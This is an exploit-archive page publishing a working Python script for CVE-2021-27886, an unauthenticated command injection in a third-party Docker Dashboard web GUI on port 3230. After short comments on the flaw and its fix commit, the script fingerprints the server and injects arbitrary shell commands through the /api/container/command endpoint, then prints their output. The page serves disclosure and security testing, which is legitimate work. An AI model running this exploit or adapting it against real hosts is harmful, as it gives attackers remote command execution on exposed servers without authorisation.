what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Docker Dashboard Remote Command Execution

Docker Dashboard Remote Command Execution
Posted Jul 7, 2021
Authored by Jeremy Brown

Docker Dashboard suffers from a remote command execution vulnerability. The fix is added in commit 79cdc41.

tags | exploit, remote
advisories | CVE-2021-27886
SHA-256 | 9b77e4733c86f91e56473cf9d0f921975dafea71ff7b3a299b9f700be4daf219

Docker Dashboard Remote Command Execution

Change Mirror Download
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# dockdash.py
#
# Docker Dashboard Remote Command Execution Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# July 2021
#
# "A simple web based GUI for managing Docker containers and images"
#
# Note: this app is NOT part of the official docker product, nor related to the
# Docker Dashboard UI in Docker Desktop. They are different projects and maintainers.
#
# More info: https://dockerdashboard.github.io
#
# -------
# Details
# -------
#
# The web GUI runs on port 3230. There are two main issues that enable the RCE...
#
# 1) Although when starting the server it says go to http://localhost:3230, it's
# actually listening on the network interface by default. There is no auth
# so anyone with access can start exercising functionality of the app.
#
# 2) Normally these controllers are used to start, stop or create new containers.
# But no validation of parameters or filtering based on acceptable commands sent
# sent to docker on the backend enables clean, vanilla command injection as the
# running user. Many of the APIs are vulnerable, with the most notables ones
# being /api/container/command and /api/image/command.
#
# ----
# Demo
# ----
#
# > ./dockdash.py 10.1.1.102 "uname -a;pwd"
# Linux ubuntu 5.4.0-48-generic #51-Ubuntu x86_64 GNU/Linux
# /opt/docker-web-gui/backend
#
# CVE-2021-27886
#
# Fix
# - commit 79cdc41
#

import sys
import argparse
import requests

DEFAULT_PORT = 3230
SIGNATURE = ('X-Powered-By', 'Express')

class DockDash(object):
def __init__(self, args):
self.target = args.target
self.cmd = args.cmd

def run(self):
target = "http://" + self.target + ':' + str(DEFAULT_PORT)

session = requests.Session()

try:
resp = session.head(target + "/")
except Exception as error:
print("Error: %s" % error)
return -1

if(SIGNATURE not in resp.headers.items()):
print("%s doesn't look like a dashboard server..." % target)
return -1

commands = self.cmd.split(';')

#
# "out here trying to get a mf'in scholarship"
#
for command in commands:
try:
resp = session.get(target + \
"/api/container/command?container=&command=;" + command)
#"/api/image/command?image=&command=;" + command)
except Exception as error:
print("Error: %s" % error)
return -1

if(resp.status_code == 200):
response = resp.text.strip('"').replace('\\n', '\n')
print("%s" % response)
else:
print("something went wrong, server returned %d" % resp.status_code)
return -1

return 0

def arg_parse():
parser = argparse.ArgumentParser()

parser.add_argument("target",
type=str,
help="DD host")

parser.add_argument("cmd",
type=str,
help="command to execute")

args = parser.parse_args()

return args

def main():
args = arg_parse()

dd = DockDash(args)

result = dd.run()

if(result > 0):
sys.exit(-1)

if(__name__ == '__main__'):
main()
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close